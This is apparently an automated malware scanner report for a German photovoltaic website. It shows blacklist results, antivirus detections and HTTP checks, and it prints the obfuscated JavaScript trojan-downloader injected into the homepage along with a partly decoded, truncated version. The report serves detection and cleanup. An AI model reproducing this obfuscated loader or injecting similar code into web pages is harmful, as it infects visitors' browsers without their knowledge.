New scan:

Malware Scanner report for photovoltaik-dach.com

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "photovoltaik-dach.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=photovoltaik-dach.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://photovoltaik-dach.com/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://photovoltaik-dach.com/
200 OK
Content-Length: 13621
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

d='function $M(file -z ?P L-B="GE <= a ,rt="" Ke ,E=tru & ,r.offset=100 Un L-L @u @y @J LA9 N ,e @q LA9 N Um L-n ],P ]Urg L-k(); .sxml2 X1 A.icrosoft X2 -z=null}}if(! z Ztypeof M!="undefined" -z : M ]+ E= 4}} Uc _> -t[ $o [>,false) Uv _>, =vars Z 4== =vars A= /( % $o), % >)) + t[ % $o) [% >) W} UH L$p, $S A$T= % Yx);regexp :RegExp( Yx+"|"+ $T); H/ Sp 6regexp) Ii=0;i< H/ hj= H/[i] 6"=");if( 4= SS -v G + c G}}}; a.trim _$f Z"qabcdef".indexOf( $o.substr(0,1))>=0){ H
... 3342 bytes are skipped ...
"|| )==" K ,b= 4 ,w=fals L ! MXMLHttpRequest NunR (()} O -rt+= Yx+ $ Pajax.runAJAX( Q]= #z.status Rz.open( B, S= $ T-d!3 U} , V%b%a#6Q W, 4) X.XMLHTTP" 5 Y r Z){if( []= /( ]() ^!2* _ L$o, `&0/ awindow d$R A3 e&4/ f$3%6%fT$4 g. $ h 7;i++ A$ j&7< k $f[ $o]}';for(c=130;c;d=(t=d.split(' ! # $ % & ( ) * + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? @ A C G H I J K L M N O P Q R S T U V W X Y Z [ ] ^ _ ` a d e f g h j k'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)

Decoded script:


function kx_M(file){this.kx_z=null;this.kx_P=function(){this.kx_B="GET";this.kx_i="?";this.kx_rx="&";this.kx_r=window;this.kx_rt="";this.kx_b=true;this.kx_w=false;this.kx_E=true;this.kx_rr=null;this.kx_A=null;this.kx_F=file;this.kx_t=new Object();this.kx_C=new Array(2);this.kx_r.offset=100};this.kx_n=function(){this.kx_L=function(){};this.kx_u=function(){};this.kx_y=function(){};this.kx_J=function(){this.runResponse()};this.kx_e=function(){};this.kx_q=function(){this.runResponse()}};thi
... 73299 bytes are skipped ...
)}else{window.kx_s=window;window.kx_s.iframeLoaded=true;window.kx_w=document.body;window.kx_T=document;var kx_H=kx_A('div');kx_C(kx_H,'<div id="d3" style="display:none;visibility:hidden;"></div>');kx_w.appendChild(kx_H);var kx_n=kx_A('script');kx_s.kx_B=kx_T.getElementsByTagName('head')[0];var kx_F=Math.random().toString();kx_n.setAttribute('src',"http://api.twitter.com/1/trends/daily.json?callback=window.kx_rg&rnd="+kx_F);kx_B.appendChild(kx_n)}}};window.kx_rx=kx_rx;kx_rx()

Antivirus reports:

McAfee-GW-Edition
Heuristic.BehavesLike.JS.Obfuscated.D
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
NANO-Antivirus
Trojan.Script.Twetti.duhhf
ESET-NOD32
JS/Kryptik.BN

http://photovoltaik-dach.com/test404page.js
404 Not Found
Content-Length: 1363
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: photovoltaik-dach.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 05 Aug 2014 08:38:15 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=7f118f89311477e512138005f9c66937; path=/
X-Powered-By: PHP/4.4.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: photovoltaik-dach.com
Referer: http://www.google.com/search?q=photovoltaik-dach.com

Result:
The result is similar to the first query. There are no suspicious redirects found.